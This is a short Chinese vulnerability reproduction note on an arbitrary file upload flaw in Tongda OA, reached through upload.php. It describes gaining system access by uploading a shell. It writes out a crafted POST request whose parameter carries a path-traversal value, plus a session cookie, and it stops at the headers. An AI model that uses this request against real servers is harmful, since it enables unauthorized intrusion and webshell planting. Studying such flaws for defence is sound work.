一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,后台/general/data_center/utils/upload.php存在任意文件上传漏洞,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。
二、 影响版本
- 通达OA2017 -通达OAV11.6
三、漏洞复现
- 通过弱口令或任意用户登录漏洞获取cookie。
- 通过获取的cookie上传文件
POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: PHPSESSID=bdvsg4irn4bm2